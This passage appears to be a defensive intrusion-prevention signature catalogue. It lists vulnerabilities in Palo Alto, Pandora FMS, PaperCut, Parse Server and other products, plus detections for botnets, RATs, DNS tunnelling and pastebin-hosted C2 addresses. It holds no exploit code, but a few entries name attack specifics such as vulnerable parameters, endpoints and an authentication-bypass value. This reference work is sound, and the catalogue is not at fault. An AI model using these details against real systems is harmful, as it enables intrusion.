Description: An information disclosure vulnerability has been reported in ownCloud graphapi app. This vulnerability is due to a third-party library containing a url that reveals the output of phpinfo. An unauthenticated attacker can use this vulnerability to obtain information about the configuration, including every environment variable on the webserver. In containerised environments these variables may contain the ownCloud admin password and other sensitive information.
Situation: HTTP_CSU-Owncloud-Information-Disclosure-CVE-2023-49103
References:
CVE-2023-49103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49103
Back to top

Ozdok-Bot

About this vulnerability: Ozdok Bot
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Ozdok is a botnet responsible for sending e-mail spam.
Situation: HTTP_CS-Ozdok-Bot-Activity
Back to top

OzymanDNS-Tunnel

About this vulnerability: OzymanDNS Tunnel
Risk: Moderate
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: OzymanDNS is a software that allows one to tunnel arbitrary traffic over regular DNS requests.
Situation: DNS-UDP_OzymanDNS-Tunnel-Request
DNS-UDP_OzymanDNS-Tunnel-Response
Back to top

PAC-Resolver-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in PAC resolver detected
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in PAC resolver detected.
Situation: File-Text_PAC-Resolver-Remote-Code-Execution
References:
CVE-2021-23406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23406
Back to top

PacketTrap-TFTP-Server-Denial-Of-Service

About this vulnerability: A PacketTrap TFTP Server Denial Of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PacketTrap TFTP Server
Type: Input Validation
Description: A vulnerability in PacketTrap TFTP Server, versions 2.0.3901.0 and before, which allows remote attackers to cause a denial of service condition by sending a pipe |, quotation mark ", or lessthan greaterthan <> characters, in the file name attribute.
Situation: TFTP_PacketTrap-TFTP-Server-Denial-Of-Service
References:
CVE-2008-1311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1311
OSVDB-42932
http://www.osvdb.org/42932
Back to top

PAJAX-Remote-Command-Execution

About this vulnerability: A PAJAX Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PAJAX
Type: Input Validation
Description: A vulnerability in PAJAX, versions 0.5.1 and earlier, which allows remote attackers to execute arbitrary code via the $method and $args parameters.
Situation: HTTP_CRL-PAJAX-Remote-Command-Execution
References:
CVE-2006-1551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551
BID-17519
http://www.securityfocus.com/bid/17519
OSVDB-24618
http://www.osvdb.org/24618
Back to top

Palevo-Botnet

About this vulnerability: Palevo botnet
Risk: High
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Palevo is a malicious botnet with a malware download component. Palevo has been observed to download malicious executables such as spambots, banking trojans or other malware downloaders. As such, users of infected PCs should not only delete Palevo, but should also make sure no other malware is running on the infected PC.
Situation: Datalength-UDP_Palevo
Back to top

Palo-Alto-Expedition-Command-Injection-CVE-2024-9463

About this vulnerability: A vulnerability in Palo Alto Expedition
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Palo Alto Expedition
Type: Input Validation
Description: Improper validation of user-submitted data in requests to the cronjob configuration causes a command injection vulnerability that allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Palo-Alto-Expedition-Command-Injection-CVE-2024-9463
References:
CVE-2024-9463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9463
Back to top

Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910

About this vulnerability: A vulnerability in Palo Alto Expedition
Risk: High
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Generic
Software: Palo Alto Expedition
Type: Insecure Configuration
Description: Missing authentication for restoreAdmin.php in Palo Alto Networks Expedition allows resetting the Expedition admin credentials to publicly known defaults.
Situation: HTTP_CSU-Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910
References:
CVE-2024-5910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5910
Back to top

Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464

About this vulnerability: A vulnerability in Palo Alto Expedition
Risk: High
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Generic
Software: Palo Alto Expedition
Type: Input Validation
Description: An OS command injection has been reported in Palo Alto Networks Expedition. An authenticated attacker can use this vulnerability to execute arbitrary OS commands, possibly leading into the disclosure of sensitive information such as cleartext passwords. Obtaining the credentials to bypass the authentication requirement for exploitation can be achieved with CVE-2024-5910.
Situation: HTTP_CRL-Palo-Alto-Expedition-OS-Command-Injection-CVE-2024-9464
References:
CVE-2024-9464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9464
Back to top

Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107

About this vulnerability: A vulnerability in Palo Alto Networks Expedition Migration Tool
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: Palo Alto Expedition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Palo Alto Networks Expedition. The vulnerability is due to improper input validation when handling requests to the /API/regionsDiscovery.php endpoint. Successfully exploiting this vulnerability could result in pre-authenticated remote code execution.
Situation: HTTP_CRL-Palo-Alto-Expedition-Regionsdiscovery.php-Insecure-Deserialization-CVE-2025-0107
References:
CVE-2025-0107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0107
Back to top

Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465

About this vulnerability: A vulnerability in Palo Alto Expedition
Risk: High
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Platform: Generic
Software: Palo Alto Expedition
Type: SQL Injection
Description: A SQL injection vulnerability has been reported in Palo Alto Networks Expedition. Successfully exploiting this vulnerability allows an unauthenticated attacker to read and create arbitrary files on the Expedition system.
Situation: HTTP_CRL-Palo-Alto-Expedition-SQL-Injection-CVE-2024-9465
References:
CVE-2024-9465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9465
Back to top

Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Palo Alto Expedition
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: Palo Alto Expedition
Type: Input Validation
Description: A vulnerability in Palo Alto Expedition, versions prior to 1.2.101, which allows remote attackers to send a crafted request to a target server and delete arbitrary files or cause a denial of service condition, due to the improper validation in the PHP script deleteParquet.php.
Situation: HTTP_CS-Palo-Alto-Networks-Expedition-deleteParquet.php-Arbitrary-File-Deletion
References:
CVE-2025-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0105
Back to top

Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108

About this vulnerability: A vulnerability in Palo Alto PAN-OS
Risk: High
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: PAN-OS
Software: <os>
Type: Directory Traversal
Description: A path confusion in Palo Alto Networks PAN-OS allows an unauthenticated attacker to invoke PHP scripts that otherwise require authentication.
Situation: HTTP_CSU-Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108
References:
CVE-2025-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0108
Back to top

Palo-Alto-SSLVPN-Authentication-Bypass

About this vulnerability: A vulnerability in Palo Alto SSLVPN Appliance
Risk: Moderate
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Platform: Generic
Software: Palo Alto SSLVPN Appliance
Type: Input Validation
Description: Palo Alto SSLVPN Appliances allow a remote attacker to turn off authentication in requests in order to gain access to the system management facilities.
Situation: HTTP_CSH-Palo-Alto-SSLVPN-Authentication-Bypass
References:
CVE-2024-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0012
Back to top

Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474

About this vulnerability: A vulnerability in Palo Alto SSLVPN Appliance
Risk: Moderate
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Platform: Generic
Software: Palo Alto SSLVPN Appliance
Type: Input Validation
Description: Palo Alto SSLVPN Appliances allow a remote attacker to turn off and bypass authentication in requests in order to gain access to the system management facilities.
Situation: HTTP_CRL-Palo-Alto-SSLVPN-Command-Execution-CVE-2024-9474
References:
CVE-2024-9474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9474
Back to top

PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400

About this vulnerability: An attempt to exploit a vulnerability in GlobalProtect detected
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1725-5242
Platform: Generic
Software: GlobalProtect
Type: Input Validation
Description: A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Situation: HTTP_CSH-Directory-Traversal-In-Session-Id-Cookie
HTTP_CSH-PAN-OS-GlobalProtect-Command-Injection-CVE-2024-3400
References:
CVE-2024-3400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3400
Back to top

PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579

About this vulnerability: A vulnerability in GlobalProtect
Risk: High
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1379-5242
Platform: Generic
Software: GlobalProtect
Type: Input Validation
Description: A format string vulnerability has been reported in PAN-OS versions before 7.1.18, 8.0.11-h1, and 8.1.2 if GlobalProtect Portal or GlobalProtect Gateway Interface is enabled. A successful exploit may allow an unauthenticated attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-PAN-OS-GlobalProtect-Remote-Code-Execution-CVE-2019-1579
References:
CVE-2019-1579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579
Back to top

PAN-OS-Remote-Code-Execution-CVE-2017-15944

About this vulnerability: A vulnerability in PAN-OS
Risk: High
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Platform: PAN-OS
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Palo Alto Networks PAN-OS versions before 6.1.19, 7.0.19, 7.1.14, and 8.0.6.
Situation: HTTP_CRL-PAN-OS-Remote-Code-Execution-CVE-2017-15944
References:
CVE-2017-15944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15944
Back to top

Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Panasonic Security API SDK
Risk: Moderate
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Panasonic Security API SDK
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Panasonic Security API SDK, Ipropsapi ActiveX Control component. The vulnerability is due to lack of bounds checking on the parameter of the GetInfoString method. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to remote code execution in the security context of the currently logged on user.
Situation: File-Text_Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow
References:
CVE-2015-4647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4647
Back to top

Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow

About this vulnerability: A vulnerability in Panasonic Security API SDK
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Panasonic Security API SDK
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Ipropsapi ActiveX Control component of the Panasonic Security API SDK. The vulnerability is due to an error when processing the FilePassword property. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to code execution under the security context of the currently logged on user.
Situation: File-Text_Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow
References:
CVE-2015-4647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4647
Back to top

Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Panasonic Security API SDK
Risk: Moderate
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Panasonic Security API SDK
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Panasonic Security API SDK, Ipropsapi.ipropsapiCtrl.1 ActiveX Control component. The vulnerability is due to a lack of boundary checks on a parameter passed to the MulticastAddr method. A remote attacker can leverage this to cause a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing the victim to visit a specially crafted webpage. Successful exploitation could lead to remote code execution in the context of the affected user.
Situation: File-Text_Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow
References:
CVE-2015-4648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4648
Back to top

Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow

About this vulnerability: A vulnerability in Panda Software Antivirus
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Panda Software Antivirus
Type: Malfunction
Description: There exists a heap-based buffer overflow in Panda Antivirus. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Panda-AntiVirus-Zoo-Archive-Decompression-Buffer-Overflow
References:
CVE-2005-3922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3922
BID-15616
http://www.securityfocus.com/bid/15616
Back to top

Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320

About this vulnerability: A vulnerability in Pandora FMS
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Unix; Linux
Software: Pandora FMS
Type: Input Validation
Description: A vulnerability in Pandora FMS, versions v7.0NG.718 through <= v7.0NG.777.4, which allows remote attackers to execute arbitrary code via the ldap_admin_login parameter in a POST request to /pandora_console/index.php, do to insufficient input validation.
Situation: HTTP_CRL-Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320
References:
CVE-2024-11320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11320
Back to top

Pandora-FMS-Authentication-Bypass

About this vulnerability: A Pandora FMS Authentication Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pandora FMS
Type: Input Validation
Description: A vulnerability in Pandora FMS, versions 3.1 and before, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash_user parameter in conjunction with the md5 hash of "admin".
Situation: HTTP_CSU_Pandora-FMS-Authentication-Bypass
References:
CVE-2010-4279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4279
BID-45112
http://www.securityfocus.com/bid/45112
OSVDB-69549
http://www.osvdb.org/69549
Back to top

Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971

About this vulnerability: A vulnerability in Pandora FMS
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Linux
Software: Pandora FMS
Type: Input Validation
Description: An vulnerability in Pandora FMS, versions v7.0NG.724 <= v7.0NG.767 and v7.0NG.768 <= v7.0NG.780, which allows remote attackers to execute arbitrary code on a target system via the chromium_path and phantomjs_bin parameters, due to insufficient validation.
Situation: HTTP_CRL-Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971
References:
CVE-2024-12971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12971
Back to top

Pandora-FMS-Events-RCE

About this vulnerability: A vulnerability in Pandora FMS
Risk: High
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pandora FMS
Type: Input Validation
Description: There exists a vulnerability in Pandora FMS, version 7.0 NG 744, which allows remote attackers to execute arbitrary commands via the target parameter to the Events function, due to the lack of input validation.
Situation: HTTP_CRL-Pandora-FMS-Events-RCE
References:
CVE-2020-13851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13851
Back to top

Pandora-FMS-Ping-Authenticated-RCE

About this vulnerability: A vulnerability in Pandora FMS
Risk: High
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Linux
Software: Pandora FMS
Type: Input Validation
Description: There exists a vulnerability in Pandora FMS, version 7.0NG, which allows remote attackers to execute arbitrary system commands through the select_ips parameter in a POST to net_tools.php, due to the lack of user input validation.
Situation: HTTP_CRL-Pandora-FMS-Ping-Authenticated-RCE
Back to top

Papercut-Fileuploadauthenticationfilter-Authentication-Bypass

About this vulnerability: A vulnerability in PaperCut MF/NG
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Malfunction
Description: An authentication bypass vulnerability has been reported for PaperCut NG. Successfully exploiting this vulnerability could result in unauthenticated file upload and lead to possible denial of service conditions.
Situation: HTTP_CSU-Papercut-Fileuploadauthenticationfilter-Authentication-Bypass
References:
CVE-2023-3486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3486
Back to top

Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350

About this vulnerability: An attempt to exploit a vulnerability in PaperCut MF/NG detected
Risk: High
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Insecure Configuration
Description: This vulnerability exists within the SetupCompleted class of PaperCut NG 22.0.5 (Build 63914). An unauthenticated attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM.
Situation: HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350
References:
CVE-2023-27350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27350
Back to top

Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351

About this vulnerability: An attempt to exploit a vulnerability in PaperCut MF/NG detected
Risk: High
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Input Validation
Description: This vulnerability exists within the SecurityRequestFilter class of PaperCut NG 22.0.5 (Build 63914). The issue results from improper implementation of the authentication algorithm. An unauthenticated attacker can leverage this vulnerability to bypass authentication on the system.
Situation: HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351
References:
CVE-2023-27351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27351
Back to top

Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in PaperCut MF
Risk: Moderate
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Input Validation
Description: A reflected cross-site scripting vulnerability have been reported in PaperCut NG and MF. The vulnerability is due to insufficient filtering of HTML tags in user-provided data. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CSU-Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting
References:
CVE-2024-1883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1883
Back to top

Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in PaperCut MF
Risk: Moderate
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Malfunction
Description: Missing authentication on pc-upconnector requests causes a server-side request forgery vulnerability in Papercut. A successful exploitation may allow an attacker to leak information from the target system.
Situation: HTTP_CS-Papercut-NG-And-MF-PC-Upconnector-Server-Side-Request-Forgery
References:
CVE-2024-1884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1884
Back to top

Papercut-NG-External-User-Lookup-Code-Injection

About this vulnerability: A vulnerability in PaperCut PaperCut MF
Risk: Moderate
First detected in: sgpkg-ips-1655-5242
Last changed: sgpkg-ips-1655-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Input Validation
Description: The lack of proper validation of a user-supplied string before using it to execute Java code causes a code injection vulnerability in PaperCut MF and NG. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Papercut-NG-External-User-Lookup-Code-Injection
References:
CVE-2023-39469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39469
Back to top

Papercut-WebDAV-Path-Traversal-CVE-2023-39143

About this vulnerability: A vulnerability in PaperCut
Risk: High
First detected in: sgpkg-ips-1831-5242
Last changed: sgpkg-ips-1831-5242
Platform: Generic
Software: PaperCut MF/NG
Type: Directory Traversal
Description: A path traversal vulnerability in PaperCut NG and PaperCut MF before 22.1.3 on Windows allows an unauthenticated attacker to access, upload, and delete arbitrary files.
Situation: HTTP_CSU-Papercut-WebDAV-Path-Traversal-CVE-2023-39143
References:
CVE-2023-39143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39143
Back to top

Paradoxyhua-Botnet

About this vulnerability: Paradoxyhua botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Paradoxyhua is a worm that infects Linux-based systems.
Situation: Generic_CS-Paradoxyhua-Linux-Infection-Traffic
Back to top

Parallax-RAT-Traffic

About this vulnerability: Parallax RAT traffic was detected
Risk: High
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Parallax Remote Access Trojan (RAT) is a malicious program capable to control the infected system.
Situation: Generic_CS-Parallax-RAT-Traffic
Back to top

Parse-Server-Databasecontroller-Prototype-Pollution

About this vulnerability: A vulnerability in Parse Server
Risk: High
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Platform: Generic
Software: Parse Server
Type: Input Validation
Description: A prototype pollution vulnerability has been reported in Parse Server. This vulnerability is due to improper input validation for the DatabaseController. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result, in the worst case, in remote code execution.
Situation: File-Text_Parse-Server-Databasecontroller-Prototype-Pollution
References:
CVE-2022-24760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24760
Back to top

Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection

About this vulnerability: A vulnerability in Parse Server
Risk: Moderate
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: Parse Server
Type: Input Validation
Description: Improper input validation in the literalizeRegexPart function causes an SQL injection vulnerability in Parse Server. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Parse-Server-literalizeRegexPart-CVE-2024-39309-SQL-Injection
References:
CVE-2024-39309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39309
Back to top

Parse-Server-literalizeRegexPart-SQL-Injection

About this vulnerability: A vulnerability in Parse Server
Risk: High
First detected in: sgpkg-ips-1712-5242
Last changed: sgpkg-ips-1712-5242
Platform: Generic
Software: Parse Server
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Parse Server. This vulnerability is due to improper input validation in the "literalizeRegexPart" function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CSU-Parse-Server-literalizeRegexPart-SQL-Injection
References:
CVE-2024-27298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27298
Back to top

Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396

About this vulnerability: A vulnerability in Parse Server
Risk: High
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Platform: Generic
Software: Parse Server
Type: Input Validation
Description: A prototype pollution vulnerability has been reported in Parse server. This vulnerability is due to improper input validation when processing requests for updating objects. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service, and in the worst case arbitrary code execution under the security context of the user running Parse server.
Situation: File-Text_Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396
References:
CVE-2022-39396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39396
Back to top

Pastebin-File-Potentially-Containing-Malware-C2-Address

About this vulnerability: A suspicious pastebin file access detected
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Any Software
Type: Backdoor
Description: Malware may utilize "pastebin.com", a legitimate text storage service, to host their command-and-control (C2) address. They could just connect to a fixed pastebin file and collect the address before calling home. This way, the address could be dynamically updated without client-side modification. This fingerprint aims to detect such "pastebin.com" files.
Situation: File-Text_Pastebin-File-Potentially-Containing-Malware-C2-Address
Back to top

Patrowl-PatrowlManager-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Patrowl PatrowlManager.
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Generic
Software: Patrowl PatrowlManager
Type: Input Validation
Description: A vulnerability in Patrowl PatrowlManager, versions prior to 1.7.7, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the insufficient validation of the value of the "engine" key and the file extension for the newly created file on the server.
Situation: HTTP_CS-Patrowl-PatrowlManager-Unrestricted-File-Upload
References:
CVE-2021-43829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43829
Back to top

PBot-Malware

About this vulnerability: PBot malware
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Any Software
Type: Post Compromise Behaviour
Description: PBot is a remote control program written in PHP scripting language. It is often installed to compromised Linux systems.
Situation: HTTP_SS-PBot-Malware
File-Text_PBot-Malware
Back to top

PCMan-FTP-Server-Directory-Traversal

About this vulnerability: A PCMan FTP Server Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PCMan FTP Server
Type: Directory Traversal
Description: A vulnerability in PCMan FTP Server, version 2.0.7, which allows remote attackers to read arbitrary files via a directory traversal in a RETR command.
Situation: FTP_CS-Attempted-FTP-Directory-Traversal
References:
CVE-2015-7601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601
Back to top

PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities

About this vulnerability: A vulnerability in PcVue
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PcVue
Type: Buffer Overflow
Description: There are multiple insecure methods in ARC Informatique PcVue 6.0 through 10.0 that allow remote attackers to modify files.
Situation: File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-DeletePage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-AddPage
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-SaveObject
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-LoadObject
File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-GetExtendedColor
References:
CVE-2011-4044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4044
Back to top

PDF-Multiple-Stream-Filters-Obfuscation

About this vulnerability: Usage of multiple stream filters detected
Risk: Moderate
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: Usage of multiple stream filters on a PDF stream object was detected. Stream filters are normally used to encode/compress content in PDF files, but using multiple (more than two) filters to encode/compress a single object is fairly uncommon and may be an attempt to hide malicious content.
Situation: File-PDF_Multiple-Stream-Filters-Obfuscation
Back to top

Pdfium-Heap-Buffer-Overflow-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Pdfium detected
Risk: High
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1397-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a heap buffer overflow vulnerability in Pdfium detected.
Situation: File-PDF_Pdfium-Heap-Buffer-Overflow-Vulnerability
References:
CVE-2021-37984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37984
Back to top

PDGSoft-Shopping-Cart-Orders-Exposure

About this vulnerability: A vulnerability in PDGSoft Shopping Cart configuration
Risk: Moderate
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: PDGSoft Shopping Cart
Type: Insecure Configuration
Description: Misconfiguration of the PDGSoft Shopping Cart program "shopper.cgi" can disclose critical information.
Situation: HTTP_CSU-PDGSoft-Shopping-Cart-Orders-Exposure
References:
CVE-1999-0608
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0608
Back to top

Pear-Archive-Tar-CVE-2021-32610-Symbolic-Link-Handling-Arbitrary-File-Write

About this vulnerability: A vulnerability in PEAR Archive_Tar
